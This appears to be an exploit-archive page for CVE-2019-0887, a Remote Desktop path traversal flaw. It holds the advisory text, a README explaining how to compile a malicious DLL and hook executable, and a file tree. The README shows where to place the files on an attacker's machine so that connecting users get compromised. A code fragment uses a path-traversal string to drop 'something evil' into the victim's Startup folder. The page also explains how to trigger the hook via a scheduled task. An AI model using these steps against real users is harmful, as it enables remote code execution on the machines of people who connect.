Related vulnerability
Title: Microsoft Remote Desktop Services Path Traversal Vulnerability (CVE-2019-0887)
Description: Microsoft Windows is an operating system for personal devices developed by the US company Microsoft. A path traversal vulnerability exists in Microsoft Remote Desktop Services. An attacker can exploit this vulnerability to execute arbitrary code on a user's affected system. The following products and versions are affected: Microsoft Windows 10 versions, Windows 10 Version 1607, Windows 10 Version 1703, Windows 10 Version 1709, Windows 10 Version 1803, Windows 10 Version 1809, Windows 10 Version 1903
Description
Exploit for CVE-2019-0887
Introduction
# CVE-2019-0887
Compile CVE-2019-0887 and rename the output to `winhlp.dll`.
Compile Install_Hook and rename the output to `hook.exe`.
> Be careful: they must be compiled for x64.
Put them on the malicious system like this:
```bash
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
```
If you want to change the paths, these are the places to edit:
```cpp
// CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
// Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
```
Alternatively, use taskschd.msc to create a scheduled task with the trigger "On connection to user session" and set its action to the file path of hook.exe.
Then wait for someone to connect to my evil system, copy something, and get pwned...
> Tip: why not use DLL hijacking?
File snapshot
[4.0K] /data/pocs/f35b6f67fd5997a81eadc291ef57197236fcadbb
├── [4.0K] CVE-2019-0887
│ ├── [4.0K] CVE-2019-0887
│ │ ├── [8.9K] CVE-2019-0887.vcxproj
│ │ ├── [1.3K] CVE-2019-0887.vcxproj.filters
│ │ ├── [6.1K] dllmain.cpp
│ │ ├── [ 154] framework.h
│ │ ├── [ 161] packages.config
│ │ ├── [ 153] pch.cpp
│ │ └── [ 531] pch.h
│ └── [1.4K] CVE-2019-0887.sln
├── [4.0K] Install_Hook
│ └── [4.0K] ConsoleApplication
│ ├── [4.0K] ConsoleApplication
│ │ ├── [2.5K] ConsoleApplication.cpp
│ │ ├── [7.0K] ConsoleApplication.vcxproj
│ │ └── [ 991] ConsoleApplication.vcxproj.filters
│ └── [1.4K] ConsoleApplication.sln
├── [1.0K] LICENSE
└── [ 913] README.md
5 directories, 14 files
Notes
1. It is recommended to access the PoC via its original source first.
2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying or donating for the local POC. Thank you for your support.